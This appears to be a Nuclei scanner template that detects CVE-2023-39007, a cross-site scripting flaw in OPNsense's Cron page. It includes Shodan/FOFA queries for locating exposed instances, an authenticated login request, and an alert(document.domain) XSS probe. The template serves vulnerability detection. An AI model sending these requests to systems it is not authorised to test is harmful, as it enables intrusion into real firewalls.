2024-10-08 07:00:45 +00:00
id : CVE-2023-39007
info :
name : OPNsense - Cross-Site Scripting to RCE
author : ritikchaddha
severity : critical
description : |
There is a XSS in /ui/cron/item/open in the Cron component of OPNsense Community Edition before 23.7 and Business Edition before 23.4.2 via openAction in app/controllers/OPNsense/Cron/ItemController.php.
reference :
- https://logicaltrust.net/blog/2023/08/opnsense.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39007
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score : 9.6
cve-id : CVE-2023-39007
cwe-id : CWE-79
cpe : cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
metadata :
max-request : 3
vendor : opnsense
product : opnsense
shodan-query :
- title:"OPNsense"
- http.title:"opnsense"
fofa-query : title="opnsense"
google-query : intitle:"opnsense"
tags : cve2023,cve,opnsense,xss,authenticated,rce
http :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1
- |
GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body_3
words :
- "openDialog('0'+alert(document.domain)+''"
- type : word
part : header_3
words :
- "text/html"
- type : status
status :
- 200
extractors :
- type : regex
name : para
part : body
group : 1
regex :
- 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
internal : true
- type : regex
name : value
part : body
group : 2
regex :
- 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
internal : true
2024-10-08 08:39:36 +00:00
# digest: 4b0a00483046022100b07ee757743b4e89fb42fbe28cae8264f761174567ba756eb17d3e6f3f5e3f00022100d1b804077ecd32b8d70c56954c3a776a053b676ad5e36a8633a6083a00b7e7d4:922c64590222798bb761d5b6d8e72950
